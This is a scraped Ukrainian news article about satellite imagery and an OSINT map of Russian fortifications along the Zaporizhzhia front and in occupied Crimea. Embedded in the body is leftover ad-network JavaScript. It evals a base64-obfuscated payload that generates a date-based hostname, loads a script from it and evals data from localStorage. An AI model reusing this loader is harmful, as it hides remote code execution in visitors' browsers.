З’явилися нові супутникові знімки укріплень РФ вздовж лінії фронту на Запоріжжі (КАРТА)

Експерт опубліковав супутникові фотознімки та мапу оборонних укріплень російських окупаційних військ вздовж лінії фронту на Запорізькому та інших напрямках.

Оприлюднив їх у своїй статті американський військовий експерт та OSINT-аналітик Брейді Афрік, інформує Акцент.

Так, раніше експерт опублікував на своїй сторінці у Twitter посилання на онлайн карту фортифікаційних споруд російських окупантів: як вказується, вони були підготовлені експертом на основі кількамісячного аналізу супутникових знімків компанії Maxar і на них показано багато російських польових укріплень на тимчасово окупованих територіях України, зокрема і Запорізької області.

Карта російських фортифікаційних укріплень вздовж лінії фронту.
Джерело: Брейді Афрік

У статті експерта також опубліковано важливі зауваження щодо карти укріплень російських окупаційних військ:

карта не повинна розглядатися як повний перелік укріплень росії;дані не розрізняють загородження, траншеї чи інші типи укріплень.укріплення включалися, лише якщо вони з’явилися новими, використовуваними або розширеними після повномасштабного вторгнення в лютому 2022 року.не всі ці укріплення зараз укомплектовані російським персоналом. Оборона окупантів на ТОТ: супутникові знімки

На опублікованих зображеннях високої роздільної здатності видно російські укріплення на тимчасово окупованих територіях. Зокрема, на знімку нижче показано ряди зубів дракона та свіжовириті траншеї поблизу Совхозного в окупованому Криму, а також будівництво окопів біля авіабази Гвардійське.

Укріплення рф поблизу Совхохного в окупованому Криму. Джерело: Брейді Афрік Будівництво окопів біля авіабази Гвардійське в Криму. Джерело: Брейді Афрік База рф на півдні України, яку побудовали наприкінці 2022 року.
Джерело: Брейді Афрік

Також, російські війська в окупованому Бердянську укріпили аеропорт окопами та «зубами дракона». На знімку нижче зображена частина оборонної лінії вздовж дороги, що веде до аеропорту.

Укріплення рф в окупованому Бердянську. Джерело: Брейді Афрік Частина оборонної лінії вздовж західної частини дороги від аеропорту в
окупованому Бердянську. Джерело: Брейді Афрік

Ворог укріпив вже згаданими вище «зубами дракона» та окопами окуповане місто Токмак: на знімку показано частину оборонної лінії вздовж дороги, що веде до міста. Також, росіяни спорудили оборону біля окупованої Михайлівки. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Укріплення рф в окупованому Токмаку. Джерело: Брейді Афрік Оборона рф біля окупованої Михайлівки. Джерело: Брейді Афрік

На знімку нижче видно ряди «зубів дракона» поблизу окупованої Кремінної Луганської області.

Укріплення рф поблизу окупованої Кремінної. Джерело: Брейді Афрік 70-кілометровий окоп окупантів на Запоріжжі

Раніше Акцент повідомляв, що російські окупанти почали будівництво траншеї відразу з двох напрямків від початку вересня 2022 року.

«Станом на 18 жовтня вона мала безперервну довжину 70 км, що майже дорівнює третині протяжності Запорізької області зі сходу на захід, або приблизно відстані між Херсоном і Миколаєвом, чи від Відня до Братислави», — йдеться в повідомленні.

Ворожу траншею було виявлено за допомогою супутникових знімків Sentinel-2: її крайні точки на сході розміщені у полі за межами селища Маринівка Приморського району. Фотознімки можна побачити нижче.

До слова, як інформував Акцент, раніше експерт дав оцінку можливому «жесту доброї волі» окупантів на півдні та назвав ознаки, що передують відступу. (adsbygoogle = window.adsbygoogle || []).push({});

«Жест доброї волі» на Запорізькому напрямку: експерт дав оцінку планам росіян Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/z-yavilisya-novi-suputnikovi-znimki-ukriplen-rf-vzdovzh-liniyi-frontu-na-zaporizhzhi-karta/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top